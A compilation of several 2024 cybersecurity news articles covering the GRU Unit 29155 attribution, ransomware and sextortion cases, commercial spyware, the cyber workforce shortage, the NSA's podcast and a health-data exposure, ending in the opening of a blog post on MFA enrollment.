The U.S. government and a coalition of international partners have officially attributed a Russian hacking group tracked as Cadet Blizzard to the General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).
"These cyber actors are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm

The U.S. government and a coalition of international partners have officially attributed a Russian hacking group tracked as **Cadet Blizzard** to the General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).

"These cyber actors are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020," the agencies said.

"Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine."

Targets of the attacks have focused on critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of North Atlantic Treaty Organization (NATO) members, the European Union, Central American, and Asian countries.

The joint advisory, released last week as part of a coordinated exercise dubbed Operation Toy Soldier, comes from cybersecurity and intelligence authorities in the U.S., the Netherlands, the Czech Republic, Germany, Estonia, Latvia, Ukraine, Canada, Australia, and the U.K.

Cadet Blizzard, also known as Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589, gained attention in January 2022 for deploying the destructive WhisperGate (aka PAYWIPE) malware against multiple Ukrainian victim organizations in advance of Russia's full-blown military invasion of the country.

Back in June 2024, a 22-year-old Russian national named Amin Timovich Stigal was indicted in the U.S. for his alleged role in staging destructive cyber attacks against Ukraine using the wiper malware. That said, the use of WhisperGate is said to be not unique to the group.

The U.S. Department of Justice (DoJ) has since charged five officers associated with Unit 29155 for conspiracy to commit computer intrusion and wire fraud conspiracy against targets in Ukraine, the U.S. and 25 other NATO countries.

The names of the five officers are listed below -

*   Yuriy Denisov (Юрий Денисов), a colonel in the Russian military and a commanding officer of Cyber Operations for Unit 29155
*   Vladislav Borovkov (Владислав Боровков), Denis Denisenko (Денис Денисенко), Dmitriy Goloshubov (Дима Голошубов), and Nikolay Korchagin (Николай Корчагин), lieutenants in the Russian military assigned to Unit 29155 who worked on cyber operations

"The defendants did so in order to sow concern among Ukrainian citizens regarding the safety of their government systems and personal data," the DoJ said. "The defendants' targets included Ukrainian Government systems and data with no military or defense-related roles. Later targets included computer systems in countries around the world that were providing support to Ukraine."

Concurrent with the indictment, the U.S. Department of State's Rewards for Justice program has announced a reward of up to $10 million for information on any of the defendants' locations or their malicious cyber activity.

Indications are that Unit 29155 is responsible for attempted coups, sabotage, and influence operations, and assassination attempts throughout Europe, with the adversary broadening their horizons to include offensive cyber operations since at least 2020.

The end goal of these cyber intrusions is to collect sensitive information for espionage purposes, inflict reputational harm by leaking said data, and orchestrate destructive operations that aim to sabotage systems containing valuable data.

Unit 29155, per the advisory, is believed to comprise junior, active-duty GRU officers, who also rely on known cybercriminals and other civilian enablers such as Stigal to facilitate their missions.

These comprise website defacements, infrastructure scanning, data exfiltration, and data leak operations that involve releasing the information on public website domains or selling it to other actors.

Attack chains commence with scanning activity that leverages known security flaws in Atlassian Confluence Server and Data Center, Dahua Security, and Sophos' firewall to breach victim environments, followed by using Impacket for post-exploitation and lateral movement, and ultimately exfiltrating data to dedicated infrastructure.

"Cyber actors may have used Raspberry Robin malware in the role of an access broker," the agencies noted. "Cyber actors targeted victims' Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords."

Organizations are recommended to prioritize routine system updates and remediate known exploited vulnerabilities, segment networks to prevent the spread of malicious activity, and enforce phishing-resistant multi-factor authentication (MFA) for all externally facing account services.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Offers $10 Million for Info on Russian Cadet Blizzard Hackers Behind Major Attacks

Plus: Kaspersky’s US business sold, Nigerian sextortion scammers jailed, and Europe’s controversial encryption plans return.

Your devices may be revealing a lot more about your life than you realize.

During the Democratic National Convention in Chicago last month, we set out to find just how much data is floating around in the digital ether all around us. Armed with a fanny pack filled with radios—including a hot spot loaded with custom code developed by the digital rights nonprofit the Electronic Frontier Foundation and an Android phone armed with the data-revealing app Wiggle—WIRED reporters collected signals from nearly 300,000 devices in and around the DNC. This included more than 2,500 police body cameras, which effectively revealed how the Chicago Police Department deployed its officers at the protests. It also exposed new ways everyone—police and activists alike—can be surveilled via our gadgets.

Thanks to a legal dispute over content moderation, Elon Musk’s X has been blocked in Brazil for a week—mostly, away. The South American nation has some 20,000 internet service providers and lacks the centralized stranglehold over internet infrastructure that authoritarian countries like Iran have built. So when it comes to blocking an entire social network in Brazil, the whole thing is a bit of a mess.

Speaking of Musk-run companies, SpaceX is getting a big new customer for its Starlink satellite internet service: the United States Navy. In addition to providing sailors with a way to stay connected to friends and family while out at sea, Starlink is part of a large project to connect US warships wherever they are in the world.

Russia’s military intelligence agency, GRU, is known for having some of the most aggressive hacking teams on the planet. Now, it’s added a new one: GRU Unit 29155—a unit notorious for coup attempts, bombings, and other physical attacks—has a cyber warfare team of its own, according to the US and other Western governments. Dubbed Cadet Blizzard, the hacking team is said to have carried out attacks against Ukraine using destructive Whispergate malware, defaced Ukrainian government websites, and leaked information while posing as a hacktivist group. It all adds up to more evidence of the increasingly blurry lines between cyber and kinetic warfare.

Activists in Japan have been waging a pressure campaign against a company many people don’t know exists. The FANUC Corporation makes industrial robots, which are used for a wide variety of purposes. The activists claim this includes weapons manufacturing—specifically weapons used by Israel in its war in Gaza—and believe the company is violating export laws and its own policies. (FANUC denies both accusations.) Whatever the case, the controversy reveals how difficult it can be to untangle ethical issues from a global supply chain.

Health care companies are among the biggest targets for criminal hackers. But sometimes, the security issues come from the inside. Therapy sessions and other sensitive patient records were recently left exposed in a misconfigured database operated by Confidant Health, which provides addiction recovery care and other mental health services. The company says it secured the database immediately after a researcher alerted them to the fact that it was publicly accessible online, but it’s still a reminder of just how many of our deepest secrets can find their way into the open by accident.

Even those of you who do everything you can to secure those secrets can find yourself vulnerable—especially if you’re using a YubiKey 5 authentication token. The multifactor authentication devices can be cloned thanks to a cryptographic flaw that can’t be patched. The company has rolled out some mitigation measures—and the attack itself is relatively difficult to pull off. But it may be time to invest in a new dongle.

That’s not all, folks. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

At the end of August, cybercriminals from the ransomware group RansomHub appear to have hacked into the systems of Planned Parenthood’s Montana branch. The organization this week confirmed it had suffered from a “cybersecurity incident” on August 28 and said its staff immediately took parts of its network offline, reporting the incident to law enforcement.

Days after the incident took place, RansomHub claimed to be behind the attack, posting Planned Parenthood on its leak website. The criminal group said it would publish 93 GB of data. It is unclear what, if anything, the ransomware group has obtained, but Planned Parenthood clinics can hold a huge array of highly sensitive data about patients, including information on abortion appointments. (Around 400,000 Planned Parenthood patients in Los Angeles were impacted following a similar ransomware incident in 2021.)

In recent months, RansomHub has emerged as one of the most active ransomware-as-a-service groups, following the law enforcement disruption of LockBit. According to an FBI and Cybersecurity and Infrastructure Security Agency alert at the end of August, the group is “efficient and successful” and has stolen data from at least 210 victims since it formed in February. “The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims,” the alert said.

**Nigerian Sextortion Scammers Sentenced to 17 Years After Teen Death**

The Nigeria-based scammers known as the Yahoo Boys run almost every scam in the playbook—from romance scams to pretending to be FBI agents. Yet there's little-more devious than the increase in sextortion cases linked to the West African scammers. This week, Nigerian brothers Samuel Ogoshi and Samson Ogoshi were sentenced to more than 17 years in US jail for running sextortion scams, following their extradition earlier this year. It is the first time Nigerian scammers have been prosecuted for sextortion in the US, the BBC reported.

The Ogoshi brothers, who pleaded guilty in April, have been linked to the death of 17-year-old Jordan DeMay, who took his life six hours after he started talking to the scammers, who posed as a girl, on Instagram. The teenager had been duped into sending the brothers explicit images, and after he had done so, they threatened to post the images online unless he paid them hundreds of dollars. US prosecutors said the brothers sexually exploited and extorted more than 100 victims, with at least 11 of them being minors. There has been a huge spike in sextortion cases in recent years.

**Kaspersky’s Banned US Business Sold**

In June, the US Commerce Department banned the sale of Kaspersky’s antivirus tools over national security concerns about its links to the Russian government. (Kaspersky has, for years, denied connections). The firm later fired its workers and said it was closing its US business. This week, cybersecurity company Pango Group announced it is purchasing Kaspersky Lab’s US antivirus customers, according to Axios. This equates to around 1 million customers, who will be transitioned to Pango’s antivirus software Ultra AV. Ahead of the Kaspersky deal, parent company Aura also announced it was spinning out Pango Group into its own business. Pango’s president said customers would not need to take any action and that it would allow subscribers to continue to receive updates after September 29, when Kaspersky updates will stop.

**Europe’s Encryption-Busting “Chat Control” Plans Return**

For years, the EU has been trying to introduce new child protection laws that would require private chats to be scanned for child sexual abuse material—something that would potentially undermine encrypted messaging apps that provide everyday privacy to billions of people. The plans have been highly controversial and were shelved earlier this year. However, the proposed law, which has been dubbed “chat control,” reappeared in legislators’ in-trays this week. The Council of the EU, which is currently chaired by Hungary, wants to pass legislation by October, but reports say strong resistance to the plans still remain.

Hackers Threaten to Leak Planned Parenthood Data

Vendors of mercenary spyware tools used by nation-states to track citizens and enemies have gotten savvy about evading efforts to limit their use.

Source: Robert Brown via Alamy Stock Photo

Efforts by the US and other governments to curb the development, use, and proliferation of powerful spyware tools like NSO Group's Pegasus and Intellexa Consortium's Predator have largely been unsuccessful. Rather, they appear to have encouraged these espionage retailers to improve their ability to evade detection and do business in the shadows.

Spyware could arguably have some legitimate law enforcement or intelligence gathering use case, however, human-rights-abuse watchers have soundly established tools like Pegasus and Predator as tools employed by authoritarian governments to spy on journalists, dissidents, and citizens, and to police their activity. Western governments (including the US, the UK, and others across Europe) recognize these spyware tools as a threat to human rights and basic freedoms, and have joined to try and stop their use through sanctions and other enforcement actions.

In 2021, the US Department of Commerce sanctioned NSO Group, Candiru Ltd., and two suppliers. In 2023, it added Intellexa Consortium to the list for "trafficking in cyber exploits used to gain access to information systems, threatening the privacy and security of individuals and organizations worldwide," according to a Sept. 4 report from The Atlantic Council DFRLab.

Further in 2023, the US proposed blocking government agencies from using commercial spyware and joined with several other countries to pledge to work against the misuse and spread of commercial spyware, DFRLab's report noted. In March of 2024, the US Department of the Treasury also levied sanctions against seven spyware entities. And the following month, the US government also issued Visa restrictions to "promote the accountability for the misuse of commercial spyware," the report added.

It worked for a time. But the market for governments who want to use spyware against their citizens proved too big of a prize for these vendors to miss out on: the Atlantic Council report also highlighted the subsequent return of sanctioned spyware sellers.

"Most available evidence suggests that spyware sales are a present reality and likely to continue," the Atlantic Council admitted. "Proliferation heedless of its potential human rights harms and national security risks, however, is not a stable status quo."

**Predator Spyware Claws Back With Location Obfuscation**

Take Predator as an example. In 2024 Predator spyware use dropped sharply after the company was sanctioned, according to researchers at Insikt Group. But recently, new and improved Predator infrastructure has been detected in more countries, including the Democratic Republic of Congo and Angola.

Updates to the new and improved Predator tool anonymizes customer operations, which obscures which countries are using the spyware, Insikt Group reported in a Sept. 5 report on Predator.

"This change makes it more difficult for researchers and cybersecurity defenders to track the spread of Predator," the report added.

But Predator is hardly the only spyware tool gaming its location to evade oversight. The Atlantic Council's report identifies several ways spyware vendors have adapted to take advantage of jurisdictional gaps, including simply by structuring their businesses with subsidiaries, partners, and other relationships scattered across different areas. Spyware vendors also play games with naming and re-naming their companies and legal entities in an effort to get around sanctions and other regulation.

"The most persistently shifting identity is that of the firm originally known as Candiru Ltd., which changed its name four times over the ensuing nine years, and is known at the time of this writing as Saito Tech Ltd," the Atlantic Council's report noted.

The strategy goes beyond business operations; this jurisdictional shell game also allows these vendors to court investors from a wider range of countries.

"These relocations may offer a variety of location-specific benefits, from facilitating sales to the EU market with an EU-domiciled firm to situating branches in states with more forgiving laws," the Atlantic Council report said.

The good news is, these loopholes could be closed, according to the Atlantic Council, with more controls and scrutiny on spyware investment.

"Improving corporate transparency requirements, such as the US’ recent move to compel companies to report their beneficial owners in line with policies in other countries, will support improved investor due diligence and deal review inside the United States," according to the report. "For vendors located outside the US, a recent notice of proposed rulemaking to extend US security review over some forms of outbound investment could provide the basis to catalog and potentially block investment."

**Spyware Vendors Concentrated in Three Countries**

The Atlantic Council report said the current spyware vendor landscape is heavily concentrated in three areas: Israel, India, and Italy. While there has been a lot of focus on Israeli spyware firms like NSO Group, the Atlantic Council report encourages Western governments to expand their sanctions focus to companies working out of India and Italy as well, two countries that were recently left out of the high-profile international sanctions from the UK and France against cyber intrusion tools, called the Pall Mall Process.

India is home to five prolific spyware vendors, including Aglaya Scientific Aerospace Technology Systems Private Limited and Appin Security Group, and Italy has six, including Memento Labs, Movia SPA, the report points out.

More needs to be done to bring transparency to the spyware market, the Atlantic Council report urged.

"Nascent steps by a handful of countries demonstrate that a more vigorous approach to shape the behavior of spyware vendors, their supply chain, and their investors is possible," its report said. "However, much more remains to be done."

Commercial Spyware Use Roars Back Despite Sanctions

The Biden administration launches an initiative to encourage careers in cybersecurity, as businesses try new tactics to get unfilled IT security roles staffed.

Source: Prisma by Dukas Presseagentur GmbH via Alamy Stock Photo

With more than half a million cybersecurity jobs unfilled nationwide in the US, private enterprise and the federal government alike are focusing efforts to help fill the gap by changing hiring strategies and encouraging careers in IT security.

This week, the White House Office of the National Cyber Director (ONCD), in collaboration with the Office of Management and Budget (OMB), announced the "Service for America" initiative, which is part of the National Cyber Workforce and Education Strategy (NCWES).

The main directive is to recruit and prepare Americans for jobs in cybersecurity, technology, and artificial intelligence (AI). The initiative focuses on creating accessible career pathways by removing degree requirements, and emphasizing skills-based hiring.

To that end, the program promotes work-based learning, such as registered apprenticeships, which allow individuals to earn while they gain new skills. And on the AI front, while it is seen as having the potential to fill some of the perceived workforce gaps, human cybersecurity does not appear to be a role that is going away any time soon — for most AI and related tools, a human element is still vital to decision making.

The announcement comes as the US faces a significant cybersecurity talent shortage, with 225,200 more workers needed to fill nearly 470,000 job openings, according to a June report from CyberSeek.

Despite growing education and training programs, "many Americans do not realize that a cyber career is available to them," National Cyber Director Harry Coker Jr. said in a blog post about the initiative. "There is a perception that you need a computer science degree and a deeply technical background to get a job in cyber."

Federal initiatives are also underway to support neurodivergent candidates and those who are blind and visually impaired. And earlier this year, the administration announced a $244 million investment in apprenticeships for growing industries, including cybersecurity. The initiative also supports community-driven efforts to address local workforce needs through collaboration between employers, educational institutions, and government.

**Cyber Pros With Unconventional Backgrounds**

Erich Kron, security awareness advocate at KnowBe4, said he agreed that many people who work in roles that are not highly technical or related to computer science believe there is no path for them in cybersecurity, even if they have the interest and passion to be great at it. 

"Some of the most amazing cybersecurity talent that I am aware of has come from nontraditional paths, including those in insurance, arts and theater, as well as other seemingly unrelated trades," he said.

Kron added that tapping this well of talent to fill positions in the cybersecurity world has the benefit of infusing nontraditional thought processes and experience into the industry.

"This helps round out defenses and develop ways to defend against cybercriminals through a fresh perspective," he explained.

Meanwhile Shane Fry, CTO of RunSafe Security, said businesses, especially large organizations, tend to favor highly skilled cyber workers with a college degree.

"This can lead to some great candidates, but it also ostracizes a large group of folks that are so passionate about cyber that they picked up the skills on their own and don't have a degree to put on a resume," he said.

He added some of the smartest cyber security professionals he's worked with in his career never even stepped foot on a university campus, let alone finished a degree.

"There's a ton of opportunities for businesses to provide on the job training and external training courses to get people from the fringes of cybersecurity into the cybersecurity fold," Fry said.

That could be changing: a May survey report from the SANS Institute and GIAC found a growing emphasis on certification-based training over traditional degrees, with cybersecurity and HR managers favoring certifications by a 2:1 margin.

**Apprenticeships, Community Engagement**

Recent surveys have also indicated that the so-called "workforce shortage" may be in part to unrealistic demands for qualifications and low salaries — added to the systemic problem of persistently high burnout rates among IT security professionals.

Indicative of the issues is the fact that broke, burned out, or laid-off cybersecurity pros are turning to cybercrime side hustles to make ends meet.

The SANS report for instance found that the cybersecurity talent shortage numbers are driven by headcount gaps, and don't reflect the number of available candidates that have appropriate skills.

And indeed, while most respondents (71%) in the SANS survey said they are committed to recruiting diverse candidates, hiring efforts are hindered by internal confusion, a lack of standardized career paths, and misaligned skill sets, particularly for mid-level roles.

Survey results also indicated many organizations lack alignment between HR and cybersecurity teams, with 37% of managers suggesting HR needs a deeper understanding of cyber roles, and 46% calling for better collaboration.

**Cyber: A Rewarding Profession, But Be Realistic**

Kron noted that for those who understand that cybersecurity can be a stressful, but also incredibly rewarding, type of career field, checking out programs to help accelerate education and a career change is critical.

"It is important that people considering a career in cybersecurity understand some of the challenges of this career path, including the potential to be on call and a requirement to react quickly when incidents occur, even on weekends or in the evenings," Kron explained.

From Fry's perspective, far too many businesses have been apprehensive to spend money on training or skills development; but that's likely an untenable position.

"The impact to those organizations, and the customers of those organizations is that they will continue to fall prey to cybersecurity attacks," he said. "The longer those organizations wait to prioritize cybersecurity and build a cybersecurity pipeline, the farther behind the power curve they will be."

Thus, business' hands may be forced, and the time is right to embrace some of the federal initiatives.

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Cybersecurity Talent Shortage Prompts White House Action

The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod's actually worth a listen.

My first story for WIRED—yep, 31 years ago—looked at a group of “crypto rebels” who were trying to pry strong encryption technology from the government-classified world and send it into the mainstream. Naturally I attempted to speak to someone at the National Security Agency for comment and ideally get a window into its thinking. Unsurprisingly, that was a no-go, because the NSA was famous for its reticence. Eventually we agreed that I could fax (!) a list of questions. In return I got an unsigned response in unhelpful bureaucratese that didn’t address my queries. Even that represented a loosening of what once was total blackout on anything having to do with this ultra-secretive intelligence agency. For decades after its post–World War II founding, the government revealed nothing, not even the name, of this agency and its activities. Those in the know referred to it as “No Such Agency.”

In recent years, the widespread adoption of encryption technology and the vital need for cybersecurity has led to more openness. Its directors began to speak in public; in 2012, NSA director Keith Alexander actually keynoted Defcon. I’d spent the entire 1990s lobbying to visit the agency for my book _Crypto_; in 2013, I finally crossed the threshold of its iconic Fort Meade Headquarters for an on-the-record conversation with officials, including Alexander. NSA now has social media accounts on Twitter, Instagram, Facebook. And there is a form on the agency website for podcasters to request guest appearances by an actual NSA-ite.

So it shouldn’t be a total shock that NSA is now _doing its own podcast._ You don’t need to be an intelligence agency to know that pods are a unique way to tell stories and hold people’s attention. The first two episodes of the seven-part season dropped this week. It’s called _No Such Podcast_, earning some self-irony points from the get-go.

In keeping with the openness vibe, the NSA granted me an interview with an official in charge of the project—one of the de facto podcast producers, a title that apparently is still not an official NSA job posting. Since NSA still gotta NSA, I can’t use this person’s name. But my source did point out that in the podcast itself, both the hosts and the guests—who are past and present agency officials—speak under their actual identities. We conducted the interview via Microsoft Teams; my spokesperson and one of the hosts were in a room with an impressive background of the official seals of the NSA, the Central Security Service, and the United States Cyber Command. I did my end from a World Trade Center conference room, praying my Wi-Fi wouldn’t cut out.

Why an NSA podcast? The spokesperson explains that the NSA has the world’s best cryptologists and cryptanalysts, all of whom work in silence, and the agency wanted to talk about their critical and amazing work. “The podcast,” the spokesperson says, “is a medium that allows for good storytelling and conversation that is distinct from things we already engage in. It provides a different level of connection.” I later received a statement from Sara Siegle, the NSA’s head of strategic communications, echoing that point: “NSA believes in showcasing the incredible, dedicated work of our diverse, expert workforce. _No Such Podcast_ extends our existing efforts into a new and growing medium.” Got it.

I suggest some secondary motivations. Some of the NSA’s social media posts solicit workers, and this podcast seems likewise designed to appeal to STEM graduates who might place patriotism over working for Google or a startup. My source acknowledged that this was the case. “Recruitment is not the number one goal of the podcast, but we are certainly hoping that by showcasing the work we do here, and the real people on the show who work here, listeners might say, ‘Oh, that sounds like a really cool job—and that person seems pretty normal, right?’”

The NSA also apparently sees the podcast as a chance to answer some critics who charge that the agency is a Big Brother-ish snooping operation that threatens our privacy. In the very first episode, guest speaker Natalie Laing, the NSA’s director of operations, speaks at length about how the NSA limits itself to information relevant to national security and similar imperatives. “Compliance is our number one focus,” she says. By hitting this note so hard that my Apple Watch sent me a volume alert, the NSA seems to be using the podcast format to address suspicions that it violates privacy—especially after the shocking revelations from Edward Snowden about how much stuff the NSA does grab. (I am told Snowden’s name is not uttered in the entire NSA podcast series—no such person?)

The NSA used fairly traditional marketing skills to figure out the format of its podcast. It checked out not only popular pods, but those of its sister intelligence agencies. Yes, the CIA and FBI are already in the game. The NSA finally settled on a classical interview format where a revolving set of four hosts—not outside professionals, but the winners of an internal talent search for employees with broadcast skills—talk with officials about the agency’s operations and exploits. “We definitely wanted that conversational tone that provides space for our guests to share their expertise and stories in a way that doesn’t really feel like lectures,” says my spokesperson. The podcasts were recorded in the NSA’s own in-house video studio. That is a sentence that you will never find in a John LeCarré novel.

As you would expect, there is a lot of vetting to make sure that none of the stories shared on the pod are classified, or would compromise future operations. No, we will not find out whether there is a quantum computer in the basement of the NSA’s Fort Meade, Maryland, headquarters. While the numbers of reviewers varied by episode, I was assured it was more than a dozen and less than a hundred.

I’ve read the transcripts for the first two episodes. The series opens with a bang, with episode 1 recounting the NSA’s role in finding Osama Bin Laden. As background to the narrative, Laing and the other guest, former director of operations Jon Darby, provide a rather detailed precis of the workings of signals intelligence, or SIGINT in spook-speak, which is the core activity of the agency. They give a once-unthinkably straightforward rundown of what the NSA calls its “production cycle”—the way it grabs signals, analyzes them, and distributes them to US officials, the military, our allies, and even some people in the private sector. The information is familiar to those who have been studying intelligence agencies, or at least reading spy novels, but for many years the NSA would confirm none of this.

The description of how SIGINT helped find Bin Laden was gripping, but I missed a journalistic toughness in the questioning. Paging Barton Gellman or our own Andy Greenberg! At one point Jon Darby said, “… the fall of 2001—that’s when we really started really looking for Bin Laden.” Since the NSA was well aware al-Qaeda had already run terror operations against the US, why not earlier? And maybe an explanation of why we were blindsided by 9/11? Another question: While it’s an inspiring triumph that we located Bin Laden, it did take over 10 years. Given how much we pay for the NSA, is that acceptable?

The second episode is about cybersecurity. It struck me as relatively vague, with a lot of talk about the importance of protecting information for the military and even the space program but fewer concrete examples. The guests talk about stopping ransomware attacks but don’t say how. I would have liked to have heard more about how the NSA works with private industry to protect our infrastructure. Or doesn’t. A few spectacular breaches in recent years exposed critical government information, including several whopping hacks of Microsoft by the Russians and the Chinese. Those didn’t make it in that episode.

Still, _No Such Podcast_ can be revealing. The Bin Laden episode had a brief but intriguing digression about encryption. (Future episodes, I am told, will dive deeper into the subject, including one about the history of cryptography.) During the 1990s the NSA had been an active opponent of strong public encryption. But at the end of the decade, the Clinton Administration seemingly ended the Crypto Wars by allowing the private sector to employ the techniques. Nowadays we’ve got the FBI and other law enforcement officials caterwauling about the danger of end-to-end encryption in software made by Apple, Meta, and others. But in this podcast, the NSA’s head of operations is not crying doomsday. To the contrary, Laing brags about how the great codebreakers at the NSA, despite the revolution in private sector cryptography, are still able to get the job done. “Our ability to impact in a positive way our nation's national security, to defend our nation, that has not changed … Every day I am a little gobsmacked at the talent that we have at this agency and the things they are able to do. That absolutely has not changed. And what else hasn't changed is, we can't tell people about it generally.” While the FBI is screaming that we’re doomed if we don’t rein in end-to-end crypto, here is the NSA saying, “We got this.”

For that reason I’ll give a thumbs-up to _No Such Podcast_. Yes, it’s kind of propagandistic—how could it be otherwise?—but despite the podcast’s selective spin on its activities, there’s more signal here than noise. As a bonus, there are no ads for energy drinks, gold bullion, or newly minted cryptocurrency tokens. Also, I’m curious to hear the NSA’s take on artificial intelligence, the subject of an upcoming episode.

Before I end my discussion with the NSA, I ask a question that is top of mind for every podcaster: Will _No Such Podcast_ be picked up for season 2? “We can neither confirm or deny,” says the unnamed person I spoke to. Now _that’s_ the NSA I know.

**Time Travel**

During the six years I spent writing _Crypto_, I begged and begged to visit the NSA, to no avail. After many months of negotiation, I finally got an official interview with a key source. It was conducted at the National Cryptologic Museum, just outside the agency’s gates. Maybe that was an early sign of the thaw that has led to this podcast. But as I documented in my book, in the NSA’s first decades, silence—and an electrified, triple-layered barbed-wire fence—enveloped all that the agency touched or dealt with.

_Since all the salient information about modern crypto was withheld from public view, outsiders could only guess what happened in “The Fort.” The NSA undoubtedly operated the most sophisticated snooping operation in the world. It was universally assumed (though never admitted) that no foreign phone call, radio broadcast, or telegraph transmission was safe from the agency’s global vacuum cleaner. Signals were sucked up and the contents analyzed with a multi-MIPS computer, combing the text for anything of value. …_

_What’s more, the NSA considered itself the sole repository of cryptographic information—not just that used by the civilian government and all the armed forces, as the law dictated, but that used by the private sector as well. Ultimately, the triple-depth fence surrounding its headquarters was not only a physical barrier but a metaphor for the NSA’s near-fanatical drive to hide information about itself and its activities. In the United States of America, serious crypto existed only behind the Triple Fence._

**Ask Me One Thing**

Chris asks, “All things considered, has the internet been a good or bad thing? Or, what percentage good or bad?”

Thanks for the question, Chris. You do realize that the internet is the big, all-encompassing blob where we all now live, right? You might as well ask whether civilization is a good thing. I can think of lots of reasons to answer in the negative, but none that would send me into a cave.

Look, a lot of us went overboard 30 years ago when we realized that the internet was going to be pervasive and revolutionary, and it seemed like an opportunity to do a constructive reset on a lot of things that stood in the way of access and equality and the generally calcified way that media operated. Some of those lofty visions came true, and some unexpected hellscapes arose. Overall, the mistake that the optimists made was somehow forgetting that it would be _people_ who would make the internet what it was, and what it would become. No matter how technology might nudge us into comity, a lot of humanity won’t go there no matter what. And the massive scale of the internet, as well as the riches to be gained, can lure even the most idealistic founders into breaking bad.

I still believe that the internet provides a pathway for the best of humanity to shine. But a lot of people are simply awful, and way too many of them are in your face all the time now. So my answer is 58-42—on the side of the good. No cave for me.

_You can submit questions to_ _mail@wired.com. Write **ASK LEVY** in the subject line._

**End Times Chronicle**

1943: Publication of Herman Hesse’s futuristic, trippy final novel, _The Glass Bead Game_. Last week: Analysis of material from a Chinese space probe reveals glass beads on the moon. Just sayin’.

**Last but Not Least**

Russia’s most feared military intelligence agency now has a cyber warfare team. A meaty subject for _No Such Podcast_!

It wasn’t the NSA but the State Department that discovered the Chinese hacker of Microsoft—and that’s just one thing Secretary of State Anthony Blinken talks about in our Big Interview.

Blinken also goes on camera as the Big Interview now has video!

WIRED hunted hidden police signals at the Democratic Convention–our own SIGINT op!

_Updated 09-06-24, 12:20 pm ET: The story was updated to correct the description of the seals in an NSA meeting room._

_Don't miss future subscriber-only editions of this column._ _**Subscribe to WIRED (50% off for Plaintext readers)**_ _today._

The NSA Has a Podcast—Here's How to Decode It

Video and audio of therapy sessions, transcripts, and other patient records were accidentally exposed in a publicly accessible database operated by the virtual medical company Confidant Health.

Thousands of people’s highly sensitive health details, including audio and video of therapy sessions, were openly accessible on the internet, new research has revealed. The cache of information, associated with a US health care firm, included more than 120,000 files and more than 1.7 million activity logs.

At the end of August, security researcher Jeremiah Fowler discovered the exposed trove of information in an unsecured database linked to virtual medical provider Confidant Health. The company, which operates across five states including Connecticut, Florida, and Texas, helps provide alcohol- and drug-addiction recovery, alongside mental health treatments and other services.

Within the 5.3 terabytes of exposed data were extremely personal details about patients that go beyond personal therapy sessions. Files seen by Fowler included multiple-page reports of people’s psychiatry intake notes and details of the medical histories. “At the bottom of some of the documents it said ‘confidential health data,’” Fowler says.

For instance, one seven-page psychiatry intake file, which appeared to be based on an hour session with a patient, details issues with alcohol and other substances, including how the patient claimed to have taken “small amounts” of narcotics from their grandparent’s hospice supply before the family member passed away. In another document, a mother describes the “contentious” relationship between her husband and son, including that while her son was using stimulants he accused her partner of sexual abuse.

The exposed health documents include some medical notes on people’s appearance, mood, memory, their medications, and overall mental status. One spreadsheet seen by the researcher appears to list Confidant Health members, the number of appointments they’ve had, the types of appointment, and more.

“There’s some heartbreaking, really painful family trauma, personal trauma,” Fowler says, adding that some of the files were audio and videos of patient sessions. “It’s almost like having your deepest darkest secrets that you've told your diary revealed, and it's things that you never want to get out.”

Alongside the medical files in the exposed database were administration and verification documents, including copies of driver’s licenses, ID cards, and insurance cards, Fowler says. The logs also contained indications that some data is collected by chatbots or artificial intelligence, making references to prompts and AI responses to questions.

Confidant Health quickly shut off access to the exposed database after Fowler contacted the company, he says. The researcher, who alerts companies to exposed data and does not download any of it, says a proportion of the 120,000 files that were exposed had some form of password protection in place. Fowler says he reviewed around 1,000 files to verify the exposure and determine the source of the data so he could alert the company. He says it is unusual that an exposed database would include both locked and unlocked files.

In a statement to WIRED, Confidant Health cofounder Jon Read says the company takes security concerns seriously and “take\[s\] issue with the sensational nature” of the findings. Read says once the company had been notified of the “improper configuration,” access to the exposed files was “fixed in less than an hour.”

Therapy Sessions Exposed by Mental Health Care Firm’s Unsecured Database

In my opinion, mandatory enrollment is best enrollment.

Thursday, September 5, 2024 14:00

As most quality thoughts go, my most recent musing on security came about because of fantasy football. 

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.  

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials. 

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA. 

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone). 

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day. 

